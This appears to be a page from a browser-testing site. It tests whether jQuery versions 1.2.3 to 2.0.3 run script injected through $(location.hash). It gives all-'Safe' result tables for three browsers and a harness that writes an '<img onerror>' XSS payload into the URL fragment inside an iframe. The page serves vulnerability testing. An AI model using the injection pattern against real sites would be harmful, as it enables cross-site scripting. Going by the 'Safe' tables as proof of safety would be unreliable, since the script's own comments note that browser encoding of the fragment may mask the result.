jQuery ID selector + location.hash

// Pattern under test: the URL fragment, which is chosen by whoever supplies
// the link, is passed unmodified to jQuery's $() as a selector string.
$(location.hash)

By
Psych0tr1a 0 Seen 520 times
Tags
DOM XSS Jquery Selector

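Results ("Safe" means the injected onerror handler had not run within the script's 2-second window in that browser)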


Tested on
Chrome - 69 - Windows 10
jQuery version | Status
jQuery 2.0.3 | Safe
jQuery 2.0.2 | Safe
jQuery 2.0.0 | Safe
jQuery 1.10.2 | Safe
jQuery 1.10.1 | Safe
jQuery 1.10.0 | Safe
jQuery 1.9.1 | Safe
jQuery 1.9.0 | Safe
jQuery 1.8.3 | Safe
jQuery 2.0.1 | Safe
jQuery 1.8.1 | Safe
jQuery 1.3.2 | Safe
jQuery 1.3.1 | Safe
jQuery 1.3.0 | Safe
jQuery 1.6.0 | Safe
jQuery 1.4.4 | Safe
jQuery 1.5.2 | Safe
jQuery 1.5.1 | Safe
jQuery 1.5.0 | Safe
jQuery 1.4.3 | Safe
jQuery 1.8.0 | Safe
jQuery 1.7.2 | Safe
jQuery 1.7.1 | Safe
jQuery 1.7.0 | Safe
jQuery 1.4.2 | Safe
jQuery 1.2.6 | Safe
jQuery 1.2.3 | Safe
jQuery 1.4.1 | Safe
jQuery 1.6.3 | Safe
jQuery 1.6.1 | Safe
jQuery 1.4.0 | Safe
jQuery 1.6.4 | Safe
jQuery 1.6.2 | Safe
jQuery 1.8.2 | Safe

Tested on
Chrome Mobile - 41 - Android
jQuery version | Status
jQuery 2.0.3 | Safe
jQuery 2.0.2 | Safe
jQuery 2.0.1 | Safe
jQuery 2.0.0 | Safe
jQuery 1.10.2 | Safe
jQuery 1.10.1 | Safe
jQuery 1.10.0 | Safe
jQuery 1.9.1 | Safe
jQuery 1.9.0 | Safe
jQuery 1.8.3 | Safe
jQuery 1.8.2 | Safe
jQuery 1.8.1 | Safe
jQuery 1.8.0 | Safe
jQuery 1.7.2 | Safe
jQuery 1.7.1 | Safe
jQuery 1.7.0 | Safe
jQuery 1.6.4 | Safe
jQuery 1.6.3 | Safe
jQuery 1.6.2 | Safe
jQuery 1.6.1 | Safe
jQuery 1.6.0 | Safe
jQuery 1.5.2 | Safe
jQuery 1.5.1 | Safe
jQuery 1.5.0 | Safe
jQuery 1.4.4 | Safe
jQuery 1.4.3 | Safe
jQuery 1.4.2 | Safe
jQuery 1.4.1 | Safe
jQuery 1.4.0 | Safe
jQuery 1.3.2 | Safe
jQuery 1.3.1 | Safe
jQuery 1.3.0 | Safe
jQuery 1.2.6 | Safe
jQuery 1.2.3 | Safe

Tested on
Googlebot - 2.1 - undefined
jQuery version | Status
jQuery 2.0.3 | Safe
jQuery 2.0.2 | Safe
jQuery 2.0.1 | Safe
jQuery 2.0.0 | Safe
jQuery 1.10.2 | Safe
jQuery 1.10.1 | Safe
jQuery 1.10.0 | Safe
jQuery 1.9.1 | Safe
jQuery 1.9.0 | Safe
jQuery 1.8.3 | Safe
jQuery 1.8.2 | Safe
jQuery 1.8.1 | Safe
jQuery 1.8.0 | Safe
jQuery 1.7.2 | Safe
jQuery 1.7.1 | Safe
jQuery 1.7.0 | Safe
jQuery 1.6.4 | Safe
jQuery 1.6.3 | Safe
jQuery 1.6.2 | Safe
jQuery 1.6.1 | Safe
jQuery 1.6.0 | Safe
jQuery 1.5.2 | Safe
jQuery 1.5.1 | Safe
jQuery 1.5.0 | Safe
jQuery 1.4.4 | Safe
jQuery 1.4.3 | Safe
jQuery 1.4.2 | Safe
jQuery 1.4.1 | Safe
jQuery 1.4.0 | Safe
jQuery 1.3.2 | Safe
jQuery 1.3.1 | Safe
jQuery 1.3.0 | Safe
jQuery 1.2.6 | Safe
jQuery 1.2.3 | Safe

User Script (ENUM_FUNCTION)

					
// Version string of the jQuery release currently being probed. test() writes
// it; vulnerable(), safe() and test()'s error path read it when reporting.
var jQuery_version = "";

/**
 * Record a "Vulnerable" verdict for the jQuery release currently under test.
 *
 * Called from inside the test iframe (as parent.vulnerable()) when the
 * marker variable was flipped by the injected onerror handler. The label is
 * built from the global jQuery_version; addError is supplied by the harness.
 */
function vulnerable(){
	var label = 'jQuery ' + jQuery_version;
	var verdict = '<b>Vulnerable</b>';
	addError(label, verdict);
}

/**
 * Record a "Safe" verdict for the jQuery release currently under test.
 *
 * Called from inside the test iframe (as parent.safe()) when the marker
 * variable was still 0 at the time of the check. "Safe" therefore means
 * "the handler did not run in this browser", not that the release has been
 * shown to be free of the issue. addSuccess is supplied by the harness.
 */
function safe(){
	var label = 'jQuery ' + jQuery_version;
	var verdict = 'Safe';
	addSuccess(label, verdict);
}
	
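/**
 * Remove the test iframe (id 'jQueryFrameID') from the page.
 *
 * Called from inside the iframe (as parent.removeIframe()) after a verdict
 * has been reported. Does nothing when the frame is already gone or
 * detached, so a repeated or late call cannot throw.
 */
function removeIframe(){
	var frame = document.getElementById('jQueryFrameID');
	// getElementById returns null once the frame has been removed; the
	// original dereferenced it unconditionally and threw a TypeError.
	if (!frame || !frame.parentNode) {
		return;
	}
	frame.parentNode.removeChild(frame);
}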


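/**
 * Run the `$(location.hash)` DOM XSS check against one jQuery release.
 *
 * Creates an iframe, writes a small document into it that loads the
 * requested jQuery build from the Google CDN, sets the fragment to an
 * <img onerror> marker and passes location.hash to $(). After 2 seconds the
 * frame calls parent.vulnerable() if the marker handler ran, parent.safe()
 * otherwise, and then parent.removeIframe().
 *
 * How to read the verdicts:
 *  - "Safe" only says the handler had not run after 2 seconds in this
 *    browser.
 *  - NOTE(review): a browser that percent-encodes '<', '>' and spaces when
 *    location.hash is read back hands jQuery an encoded string, so the
 *    marker cannot fire whatever the jQuery release does. A uniformly
 *    "Safe" column is consistent with that; confirm by logging
 *    location.hash inside the frame before trusting the result as a
 *    statement about jQuery itself.
 *  - If the CDN script does not load, `$` is undefined, the inline script
 *    throws before its setTimeout is registered, and no verdict is reported
 *    (the frame is also left in the page).
 *  - jQuery_version is a shared global and the frame id is fixed, so this
 *    presumably relies on the harness running one version at a time; verify
 *    against the caller.
 *
 * @param {string} data - jQuery version to test, e.g. '1.9.1'.
 */
function test(data){
	try{
		console.log(data);

		// vulnerable() and safe() read this global when the frame reports back.
		jQuery_version = data;

		// The version is spliced into markup that is written into a frame
		// scripted by this page, so only version-shaped values are accepted.
		// Anything else is reported through the catch block below.
		var version = String(data);
		if (!/^\d+(?:\.\d+)+(?:-[0-9A-Za-z]+(?:\.[0-9A-Za-z]+)*)?$/.test(version)) {
			throw new Error('unexpected jQuery version string');
		}

		var jQueryFrame = document.createElement('iframe');
		jQueryFrame.id = 'jQueryFrameID';

		// Same markup as before, split per statement for readability.
		// setTimeout with a string argument is eval-like; it is kept because
		// it is part of the published test vector.
		var exploitHTML =
			'<script src="//ajax.googleapis.com/ajax/libs/jquery/' + version + '/jquery.js"><\/script>' +
			'<script>' +
			'var tst=0;' +
			'location.hash="<img src=s onerror=tst=1>";' +
			'$(function(){$(location.hash)});' +
			'setTimeout("if(tst==1){parent.vulnerable()}else{parent.safe()};parent.removeIframe()",2000)' +
			'<\/script>';

		document.body.appendChild(jQueryFrame);

		// Declared locally: the original assigned an undeclared name, which
		// leaks a global in sloppy mode and throws in strict mode.
		var iframeDoc = jQueryFrame.contentDocument || jQueryFrame.contentWindow.document;
		iframeDoc.open();
		iframeDoc.write(exploitHTML);
		iframeDoc.close();
	}
	catch(err){
		addInfo(jQuery_version , 'Some Error Occured: ' + err);
	}
}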

					
				

Enum Data (ENUM_FUNCTION)

					
// jQuery releases to probe, newest first. Each entry is presumably handed to
// test() one at a time by the harness, where it becomes the version segment
// of the CDN script URL.
var data = [
	'2.0.3', '2.0.2', '2.0.1', '2.0.0',
	'1.10.2', '1.10.1', '1.10.0',
	'1.9.1', '1.9.0',
	'1.8.3', '1.8.2', '1.8.1', '1.8.0',
	'1.7.2', '1.7.1', '1.7.0',
	'1.6.4', '1.6.3', '1.6.2', '1.6.1', '1.6.0',
	'1.5.2', '1.5.1', '1.5.0',
	'1.4.4', '1.4.3', '1.4.2', '1.4.1', '1.4.0',
	'1.3.2', '1.3.1', '1.3.0',
	'1.2.6', '1.2.3'
];